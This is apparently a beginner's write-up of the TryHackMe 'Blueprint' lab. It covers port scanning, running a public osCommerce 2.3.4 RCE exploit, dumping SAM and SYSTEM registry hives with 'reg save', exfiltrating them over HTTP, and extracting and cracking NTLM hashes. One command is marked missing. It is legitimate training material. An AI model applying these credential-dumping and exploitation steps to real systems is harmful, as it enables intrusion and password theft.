## TryHackMe - Blueprint Methodology

This is the attack methodology I used for TryHackMe's Blueprint box.
I have based this document on the Intrusion Kill Chain by Lockheed Martin:
Reconnaissance > Weaponization > Delivery > Exploitation > Installation > Command & Control > Actions on Objectve

---
### Environment
#### Operating System
latest kali-VM
#### Tools
N/A

### Methodology
#### Objectives/Flags
 "Lab" user NTML hash decrypted
 root.txt
#### Reconnaissance
First I checked for open ports using a basic nmap scan
```bash
nmap -t4 <TargetIP>
  PORT      STATE    SERVICE
  80/tcp    open     http
  135/tcp   open     msrpc
  139/tcp   open     netbios-ssn
  443/tcp   open     https
  445/tcp   open     microsoft-ds
  512/tcp   filtered exec
  1152/tcp  filtered winpoplanmess
  1875/tcp  filtered westell-stats
  3306/tcp  open     mysql
  4662/tcp  filtered edonkey
  7741/tcp  filtered scriptview
  8080/tcp  open     http-proxy
  9010/tcp  filtered sdr
  20005/tcp filtered btx
  26214/tcp filtered unknown
  27000/tcp filtered flexlm0
  49152/tcp open     unknown
  49153/tcp open     unknown
  49154/tcp open     unknown
  49158/tcp open     unknown
  49159/tcp open     unknown
  49160/tcp open     unknown
```
I could see some HTTP open ports and decided to see what was accessible
```
http://<TargetIP>:8080/
	http://<TargetIP>:8080/oscommerce-2.3.4/catalog/
```
I could determine the framework being used for the commerce page was oscommerce-2.3.4. Using this information I visited Exploit-DB to see what was available.
```
https://www.exploit-db.com/exploits/50128
```
#### Exploitation
Using the remote-code-execution exploit from the DB, the target was attacked
```
python 50128.py http://<TargetIP>:8080/oscommerce-2.3.4/catalog/
```
Once the attack was successful, I now had RCE shell access into the target.

#### Actions on Objective
I started by trying to determine the nature of the host and explore it's file directories
```
whoami
  nt autheority\system

DIR C:\users
  Administrator
    C:\users\Administrator\Desktop\root.txt.txt
      more C:\users\Administrator\Desktop\root.txt.txt
        THM{*}
  DefaultAppPool
  Lab
```
The file-system was Windows and exploring userfiles I happend to come accross my first objective ```root.txt.txt```. According to my mentor the filename was done this way to obfuscate it from broad-searches.
My next objective was to locate and extract the NTML hash of the "Lab" user.

I must admit I didn't know what NTML was or where it was found however I had a reasonable understanding through hack-sims that this was going to be a hashed password found somewhere on the system. After some googling I was able to understand that this hash was most likley going to be located in the Windows "SAM" file generally located at ```C:\Windows\system32\config\SAM```. (source: https://security.stackexchange.com/questions/113295/location-of-password-hashes-on-a-windows-local-machine)
```
DIR C:\Windows\system32\config\
```
I could see that the file existed on the system and my goal was to now try and exfiltrate this file/data out of the target to my local machine. I had a lot of trial and error trying to get at this file. Various failures included; printing it's contents, copying it to the visible HTTP directory, Uploading it to a local-http/ftp server.
Eventually I stubled upon a page which explained how this data could be exported from it's registry key. (source: https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry)
```
reg save hklm\system system
reg save hklm\sam sam
```
With the data exported out of the system-files I could now move them around without any system-protection. I moved these files to the visible HTTP directory.
```
<missing command> http://<TargetIP>:8080/oscommerce-2.3.4/docs/
```
From my localhost I was able to save these files. My next step was to dump the hashes out of the files. Using the website I had found earlier I had to find a tool that was going to assit me.
```
python pwdump.py /home/kali/tools/TryHackMe/Blueprint/system /home/kali/tools/TryHackMe/Blueprint/sam
  Administrator:500:<hash>:<hash>:::
  Guest:501:<hash>:<hash>:::
  Lab:1000:<hash>:<hash>:::
```
Success, I've got the hash of the "Lab" user and now needed to decrypt this. I spent some time trying to mess with HashCat to crack it but after some more googling I was directed to Cracktation.
```
https://crackstation.net/
   Insert <hash> -> crack
     <password>
```
I spared myself the system resources and was able to instantly receive the cleartext password.

---
### After-action
#### What I've learned
This was the first "real" box that I've had a go at and had a blast from the whole experience. My mentor had helped my connect the dots on recconaissance and exploitaion through finding online resources/code. Once I was in, a majority of my frustrations was trying to understand what NTML was and more specifically how I was going to extract that information to my localhost. Lastly why burn the computing power when an online service can crack passwords for you.
#### What I would've done differently
Given that this was my first box, I was a bit messy with what I was actually doing on the Target Machine. I had rebooted it by attempting to run arbitrary files and possibly executed programs in trial and error.
I definitely would like to record what actions I had taken (including timestamps?) and what failures I had run into for posterity.
Lastly, I should have spent the extra effort in removing the extracted system files from the export location and even the visible HTTP directory to reduce my footprint.

